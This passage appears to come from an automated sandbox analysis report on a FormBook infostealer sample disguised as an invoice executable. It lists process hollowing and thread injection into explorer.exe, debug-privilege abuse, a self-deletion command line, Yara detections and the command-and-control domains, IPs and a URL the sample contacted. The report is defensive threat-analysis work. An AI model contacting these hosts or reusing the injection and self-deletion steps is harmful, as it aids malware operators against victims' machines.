Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 4_2_03534015 mov eax, dword ptr fs:[00000030h] 4_2_03534015
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 4_2_034E7016 mov eax, dword ptr fs:[00000030h] 4_2_034E7016
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 4_2_034E7016 mov eax, dword ptr fs:[00000030h] 4_2_034E7016
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 4_2_034E7016 mov eax, dword ptr fs:[00000030h] 4_2_034E7016
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 4_2_0349002D mov eax, dword ptr fs:[00000030h] 4_2_0349002D
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 4_2_0349002D mov eax, dword ptr fs:[00000030h] 4_2_0349002D
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 4_2_0349002D mov eax, dword ptr fs:[00000030h] 4_2_0349002D
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 4_2_0349002D mov eax, dword ptr fs:[00000030h] 4_2_0349002D
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 4_2_0349002D mov eax, dword ptr fs:[00000030h] 4_2_0349002D
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 4_2_0347B02A mov eax, dword ptr fs:[00000030h] 4_2_0347B02A
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 4_2_0347B02A mov eax, dword ptr fs:[00000030h] 4_2_0347B02A
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 4_2_0347B02A mov eax, dword ptr fs:[00000030h] 4_2_0347B02A
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 4_2_0347B02A mov eax, dword ptr fs:[00000030h] 4_2_0347B02A
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 4_2_034FB8D0 mov eax, dword ptr fs:[00000030h] 4_2_034FB8D0
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 4_2_034FB8D0 mov ecx, dword ptr fs:[00000030h] 4_2_034FB8D0
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 4_2_034FB8D0 mov eax, dword ptr fs:[00000030h] 4_2_034FB8D0
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 4_2_034FB8D0 mov eax, dword ptr fs:[00000030h] 4_2_034FB8D0
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 4_2_034FB8D0 mov eax, dword ptr fs:[00000030h] 4_2_034FB8D0
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 4_2_034FB8D0 mov eax, dword ptr fs:[00000030h] 4_2_034FB8D0
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 4_2_034658EC mov eax, dword ptr fs:[00000030h] 4_2_034658EC
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 4_2_03469080 mov eax, dword ptr fs:[00000030h] 4_2_03469080
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 4_2_034E3884 mov eax, dword ptr fs:[00000030h] 4_2_034E3884
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 4_2_034E3884 mov eax, dword ptr fs:[00000030h] 4_2_034E3884
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 4_2_034A90AF mov eax, dword ptr fs:[00000030h] 4_2_034A90AF
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 4_2_034920A0 mov eax, dword ptr fs:[00000030h] 4_2_034920A0
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 4_2_034920A0 mov eax, dword ptr fs:[00000030h] 4_2_034920A0
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 4_2_034920A0 mov eax, dword ptr fs:[00000030h] 4_2_034920A0
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 4_2_034920A0 mov eax, dword ptr fs:[00000030h] 4_2_034920A0
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 4_2_034920A0 mov eax, dword ptr fs:[00000030h] 4_2_034920A0
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 4_2_034920A0 mov eax, dword ptr fs:[00000030h] 4_2_034920A0
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 4_2_0349F0BF mov ecx, dword ptr fs:[00000030h] 4_2_0349F0BF
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 4_2_0349F0BF mov eax, dword ptr fs:[00000030h] 4_2_0349F0BF
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 4_2_0349F0BF mov eax, dword ptr fs:[00000030h] 4_2_0349F0BF
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 4_2_0347EF40 mov eax, dword ptr fs:[00000030h] 4_2_0347EF40
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 4_2_0347FF60 mov eax, dword ptr fs:[00000030h] 4_2_0347FF60
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 4_2_03538F6A mov eax, dword ptr fs:[00000030h] 4_2_03538F6A
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 4_2_0349A70E mov eax, dword ptr fs:[00000030h] 4_2_0349A70E
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 4_2_0349A70E mov eax, dword ptr fs:[00000030h] 4_2_0349A70E
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 4_2_0353070D mov eax, dword ptr fs:[00000030h] 4_2_0353070D
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 4_2_0353070D mov eax, dword ptr fs:[00000030h] 4_2_0353070D
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 4_2_0348F716 mov eax, dword ptr fs:[00000030h] 4_2_0348F716
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 4_2_034FFF10 mov eax, dword ptr fs:[00000030h] 4_2_034FFF10
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 4_2_034FFF10 mov eax, dword ptr fs:[00000030h] 4_2_034FFF10
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 4_2_03464F2E mov eax, dword ptr fs:[00000030h] 4_2_03464F2E
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 4_2_03464F2E mov eax, dword ptr fs:[00000030h] 4_2_03464F2E
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 4_2_0349E730 mov eax, dword ptr fs:[00000030h] 4_2_0349E730
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 4_2_034A37F5 mov eax, dword ptr fs:[00000030h] 4_2_034A37F5
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 4_2_03478794 mov eax, dword ptr fs:[00000030h] 4_2_03478794
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 4_2_034E7794 mov eax, dword ptr fs:[00000030h] 4_2_034E7794
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 4_2_034E7794 mov eax, dword ptr fs:[00000030h] 4_2_034E7794
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 4_2_034E7794 mov eax, dword ptr fs:[00000030h] 4_2_034E7794
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 4_2_03477E41 mov eax, dword ptr fs:[00000030h] 4_2_03477E41
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 4_2_03477E41 mov eax, dword ptr fs:[00000030h] 4_2_03477E41
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 4_2_03477E41 mov eax, dword ptr fs:[00000030h] 4_2_03477E41
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 4_2_03477E41 mov eax, dword ptr fs:[00000030h] 4_2_03477E41
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 4_2_03477E41 mov eax, dword ptr fs:[00000030h] 4_2_03477E41
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 4_2_03477E41 mov eax, dword ptr fs:[00000030h] 4_2_03477E41
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 4_2_0352AE44 mov eax, dword ptr fs:[00000030h] 4_2_0352AE44
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 4_2_0352AE44 mov eax, dword ptr fs:[00000030h] 4_2_0352AE44
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 4_2_0347766D mov eax, dword ptr fs:[00000030h] 4_2_0347766D
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 4_2_0348AE73 mov eax, dword ptr fs:[00000030h] 4_2_0348AE73
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 4_2_0348AE73 mov eax, dword ptr fs:[00000030h] 4_2_0348AE73
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 4_2_0348AE73 mov eax, dword ptr fs:[00000030h] 4_2_0348AE73
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 4_2_0348AE73 mov eax, dword ptr fs:[00000030h] 4_2_0348AE73
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 4_2_0348AE73 mov eax, dword ptr fs:[00000030h] 4_2_0348AE73
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 4_2_0346C600 mov eax, dword ptr fs:[00000030h] 4_2_0346C600
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 4_2_0346C600 mov eax, dword ptr fs:[00000030h] 4_2_0346C600
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 4_2_0346C600 mov eax, dword ptr fs:[00000030h] 4_2_0346C600
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 4_2_03498E00 mov eax, dword ptr fs:[00000030h] 4_2_03498E00
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 4_2_0349A61C mov eax, dword ptr fs:[00000030h] 4_2_0349A61C
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 4_2_0349A61C mov eax, dword ptr fs:[00000030h] 4_2_0349A61C
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 4_2_03521608 mov eax, dword ptr fs:[00000030h] 4_2_03521608
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 4_2_0346E620 mov eax, dword ptr fs:[00000030h] 4_2_0346E620
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 4_2_0351FE3F mov eax, dword ptr fs:[00000030h] 4_2_0351FE3F
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 4_2_03538ED6 mov eax, dword ptr fs:[00000030h] 4_2_03538ED6
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 4_2_034936CC mov eax, dword ptr fs:[00000030h] 4_2_034936CC
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 4_2_034A8EC7 mov eax, dword ptr fs:[00000030h] 4_2_034A8EC7
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 4_2_0351FEC0 mov eax, dword ptr fs:[00000030h] 4_2_0351FEC0
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 4_2_034776E2 mov eax, dword ptr fs:[00000030h] 4_2_034776E2
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 4_2_034916E0 mov ecx, dword ptr fs:[00000030h] 4_2_034916E0
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 4_2_034FFE87 mov eax, dword ptr fs:[00000030h] 4_2_034FFE87
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 4_2_034E46A7 mov eax, dword ptr fs:[00000030h] 4_2_034E46A7
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 4_2_03530EA5 mov eax, dword ptr fs:[00000030h] 4_2_03530EA5
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 4_2_03530EA5 mov eax, dword ptr fs:[00000030h] 4_2_03530EA5
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 4_2_03530EA5 mov eax, dword ptr fs:[00000030h] 4_2_03530EA5
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 4_2_034A3D43 mov eax, dword ptr fs:[00000030h] 4_2_034A3D43
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 4_2_034E3540 mov eax, dword ptr fs:[00000030h] 4_2_034E3540
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 4_2_03487D50 mov eax, dword ptr fs:[00000030h] 4_2_03487D50
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 4_2_0348C577 mov eax, dword ptr fs:[00000030h] 4_2_0348C577
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 4_2_0348C577 mov eax, dword ptr fs:[00000030h] 4_2_0348C577
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 4_2_03538D34 mov eax, dword ptr fs:[00000030h] 4_2_03538D34
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 4_2_0352E539 mov eax, dword ptr fs:[00000030h] 4_2_0352E539
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 4_2_03494D3B mov eax, dword ptr fs:[00000030h] 4_2_03494D3B
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 4_2_03494D3B mov eax, dword ptr fs:[00000030h] 4_2_03494D3B
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 4_2_03494D3B mov eax, dword ptr fs:[00000030h] 4_2_03494D3B
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 4_2_03473D34 mov eax, dword ptr fs:[00000030h] 4_2_03473D34
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 4_2_03473D34 mov eax, dword ptr fs:[00000030h] 4_2_03473D34
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 4_2_03473D34 mov eax, dword ptr fs:[00000030h] 4_2_03473D34
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 4_2_03473D34 mov eax, dword ptr fs:[00000030h] 4_2_03473D34
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 4_2_03473D34 mov eax, dword ptr fs:[00000030h] 4_2_03473D34
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 4_2_03473D34 mov eax, dword ptr fs:[00000030h] 4_2_03473D34
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 4_2_03473D34 mov eax, dword ptr fs:[00000030h] 4_2_03473D34
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 4_2_03473D34 mov eax, dword ptr fs:[00000030h] 4_2_03473D34
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 4_2_03473D34 mov eax, dword ptr fs:[00000030h] 4_2_03473D34
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 4_2_03473D34 mov eax, dword ptr fs:[00000030h] 4_2_03473D34
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 4_2_03473D34 mov eax, dword ptr fs:[00000030h] 4_2_03473D34
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 4_2_03473D34 mov eax, dword ptr fs:[00000030h] 4_2_03473D34
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 4_2_03473D34 mov eax, dword ptr fs:[00000030h] 4_2_03473D34
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 4_2_0346AD30 mov eax, dword ptr fs:[00000030h] 4_2_0346AD30
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 4_2_034EA537 mov eax, dword ptr fs:[00000030h] 4_2_034EA537
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 4_2_034E6DC9 mov eax, dword ptr fs:[00000030h] 4_2_034E6DC9
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 4_2_034E6DC9 mov eax, dword ptr fs:[00000030h] 4_2_034E6DC9
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 4_2_034E6DC9 mov eax, dword ptr fs:[00000030h] 4_2_034E6DC9
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 4_2_034E6DC9 mov ecx, dword ptr fs:[00000030h] 4_2_034E6DC9
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 4_2_034E6DC9 mov eax, dword ptr fs:[00000030h] 4_2_034E6DC9
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 4_2_034E6DC9 mov eax, dword ptr fs:[00000030h] 4_2_034E6DC9
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 4_2_03518DF1 mov eax, dword ptr fs:[00000030h] 4_2_03518DF1
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 4_2_0347D5E0 mov eax, dword ptr fs:[00000030h] 4_2_0347D5E0
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 4_2_0347D5E0 mov eax, dword ptr fs:[00000030h] 4_2_0347D5E0
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 4_2_0352FDE2 mov eax, dword ptr fs:[00000030h] 4_2_0352FDE2
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 4_2_0352FDE2 mov eax, dword ptr fs:[00000030h] 4_2_0352FDE2
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 4_2_0352FDE2 mov eax, dword ptr fs:[00000030h] 4_2_0352FDE2
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 4_2_0352FDE2 mov eax, dword ptr fs:[00000030h] 4_2_0352FDE2
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 4_2_03492581 mov eax, dword ptr fs:[00000030h] 4_2_03492581
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 4_2_03492581 mov eax, dword ptr fs:[00000030h] 4_2_03492581
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 4_2_03492581 mov eax, dword ptr fs:[00000030h] 4_2_03492581
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 4_2_03492581 mov eax, dword ptr fs:[00000030h] 4_2_03492581
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 4_2_03462D8A mov eax, dword ptr fs:[00000030h] 4_2_03462D8A
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 4_2_03462D8A mov eax, dword ptr fs:[00000030h] 4_2_03462D8A
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 4_2_03462D8A mov eax, dword ptr fs:[00000030h] 4_2_03462D8A
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 4_2_03462D8A mov eax, dword ptr fs:[00000030h] 4_2_03462D8A
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 4_2_03462D8A mov eax, dword ptr fs:[00000030h] 4_2_03462D8A
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 4_2_0349FD9B mov eax, dword ptr fs:[00000030h] 4_2_0349FD9B
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 4_2_0349FD9B mov eax, dword ptr fs:[00000030h] 4_2_0349FD9B
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 4_2_034935A1 mov eax, dword ptr fs:[00000030h] 4_2_034935A1
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 4_2_03491DB5 mov eax, dword ptr fs:[00000030h] 4_2_03491DB5
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 4_2_03491DB5 mov eax, dword ptr fs:[00000030h] 4_2_03491DB5
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 4_2_03491DB5 mov eax, dword ptr fs:[00000030h] 4_2_03491DB5
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 4_2_035305AC mov eax, dword ptr fs:[00000030h] 4_2_035305AC
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 4_2_035305AC mov eax, dword ptr fs:[00000030h] 4_2_035305AC
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 4_2_0349A44B mov eax, dword ptr fs:[00000030h] 4_2_0349A44B
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 4_2_034FC450 mov eax, dword ptr fs:[00000030h] 4_2_034FC450
Enables debug privileges
Source: C:\Users\user\Desktop\PT300975-inv.exe Process token adjusted: Debug Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe Process token adjusted: Debug Jump to behavior
Source: C:\Windows\SysWOW64\ipconfig.exe Process token adjusted: Debug Jump to behavior
Source: C:\Users\user\Desktop\PT300975-inv.exe Memory allocated: page read and write | page guard Jump to behavior

HIPS / PFW / Operating System Protection Evasion:

barindex
System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\explorer.exe Network Connect: 156.241.53.196 80 Jump to behavior
Source: C:\Windows\explorer.exe Network Connect: 198.54.117.244 80 Jump to behavior
Maps a DLL or memory area into another process
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe Section loaded: unknown target: C:\Windows\SysWOW64\ipconfig.exe protection: execute and read and write Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe Section loaded: unknown target: C:\Windows\SysWOW64\ipconfig.exe protection: execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\ipconfig.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: read write Jump to behavior
Source: C:\Windows\SysWOW64\ipconfig.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write Jump to behavior
Modifies the context of a thread in another process (thread injection)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe Thread register set: target process: 3440 Jump to behavior
Source: C:\Windows\SysWOW64\ipconfig.exe Thread register set: target process: 3440 Jump to behavior
Queues an APC in another process (thread injection)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe Thread APC queued: target process: C:\Windows\explorer.exe Jump to behavior
Sample uses process hollowing technique
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe Section unmapped: C:\Windows\SysWOW64\ipconfig.exe base address: E30000 Jump to behavior
Creates a process in suspended mode (likely to inject code)
Source: C:\Users\user\Desktop\PT300975-inv.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe Jump to behavior
Source: C:\Windows\SysWOW64\ipconfig.exe Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe' Jump to behavior
Source: explorer.exe, 00000003.00000000.359794599.0000000004F80000.00000004.00000001.sdmp, ipconfig.exe, 00000004.00000002.605713889.00000000046D0000.00000002.00000001.sdmp Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 00000003.00000002.605084238.0000000000EE0000.00000002.00000001.sdmp, ipconfig.exe, 00000004.00000002.605713889.00000000046D0000.00000002.00000001.sdmp Binary or memory string: Progman
Source: explorer.exe, 00000003.00000002.605084238.0000000000EE0000.00000002.00000001.sdmp, ipconfig.exe, 00000004.00000002.605713889.00000000046D0000.00000002.00000001.sdmp Binary or memory string: &Program Manager
Source: explorer.exe, 00000003.00000002.605084238.0000000000EE0000.00000002.00000001.sdmp, ipconfig.exe, 00000004.00000002.605713889.00000000046D0000.00000002.00000001.sdmp Binary or memory string: Progmanlock

Language, Device and Operating System Detection:

barindex
Queries the volume information (name, serial number etc) of a device
Source: C:\Users\user\Desktop\PT300975-inv.exe Queries volume information: C:\Users\user\Desktop\PT300975-inv.exe VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PT300975-inv.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PT300975-inv.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PT300975-inv.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PT300975-inv.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PT300975-inv.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior

Stealing of Sensitive Information:

barindex
Yara detected FormBook
Source: Yara match File source: 00000000.00000002.346082629.0000000004983000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.384709518.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.345935550.000000000489F000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.384973697.0000000004DD0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.603415993.0000000000990000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.603938511.0000000000DF0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.385166130.00000000050D0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.604508928.0000000002F40000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 2.2.mscorsvw.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.2.mscorsvw.exe.400000.0.unpack, type: UNPACKEDPE

Remote Access Functionality:

barindex
Yara detected FormBook
Source: Yara match File source: 00000000.00000002.346082629.0000000004983000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.384709518.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.345935550.000000000489F000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.384973697.0000000004DD0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.603415993.0000000000990000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.603938511.0000000000DF0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.385166130.00000000050D0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.604508928.0000000002F40000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 2.2.mscorsvw.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.2.mscorsvw.exe.400000.0.unpack, type: UNPACKEDPE
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 323028 Sample: PT300975-inv.exe Startdate: 26/11/2020 Architecture: WINDOWS Score: 100 31 g.msn.com 2->31 39 Malicious sample detected (through community Yara rule) 2->39 41 Multi AV Scanner detection for submitted file 2->41 43 Yara detected FormBook 2->43 45 4 other signatures 2->45 11 PT300975-inv.exe 1 2->11         started        signatures3 process4 file5 29 C:\Users\user\...\PT300975-inv.exe.log, ASCII 11->29 dropped 55 Hides that the sample has been downloaded from the Internet (zone.identifier) 11->55 15 mscorsvw.exe 11->15         started        signatures6 process7 signatures8 57 Modifies the context of a thread in another process (thread injection) 15->57 59 Maps a DLL or memory area into another process 15->59 61 Sample uses process hollowing technique 15->61 63 2 other signatures 15->63 18 explorer.exe 15->18 injected process9 dnsIp10 33 www.asacal.com 156.241.53.196, 49755, 80 XIAOZHIYUN1-AS-APICIDCNETWORKUS Seychelles 18->33 35 www.solidconstruct.site 198.54.117.244, 49750, 80 NAMECHEAP-NETUS United States 18->35 37 3 other IPs or domains 18->37 47 System process connects to network (likely due to code injection or exploit) 18->47 22 ipconfig.exe 18->22         started        signatures11 process12 signatures13 49 Modifies the context of a thread in another process (thread injection) 22->49 51 Maps a DLL or memory area into another process 22->51 53 Tries to detect virtualization through RDTSC time measurements 22->53 25 cmd.exe 1 22->25         started        process14 process15 27 conhost.exe 25->27         started       
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
156.241.53.196
 unknown Seychelles
136800 XIAOZHIYUN1-AS-APICIDCNETWORKUS true
198.54.117.244
 unknown United States
22612 NAMECHEAP-NETUS true

Private
IP
192.168.2.1

Contacted Domains

Name IP Active
www.solidconstruct.site 198.54.117.244 true
www.asacal.com 156.241.53.196 true
www.hongreng.xyz unknown unknown
g.msn.com unknown unknown
www.kornteengoods.com unknown unknown

Contacted URLs

Name Malicious Antivirus Detection Reputation
http://www.asacal.com/jqc/?JfEtEZgp=cE9UUOc3pLPT0LAdHSIP3evlMF3IBhbdmq5wG0CQLEBsctkiCkQzhS7S4EgmhhRecsIvRlsotA==&ojq0s=RzulsD true
  • Avira URL Cloud: safe
 unknown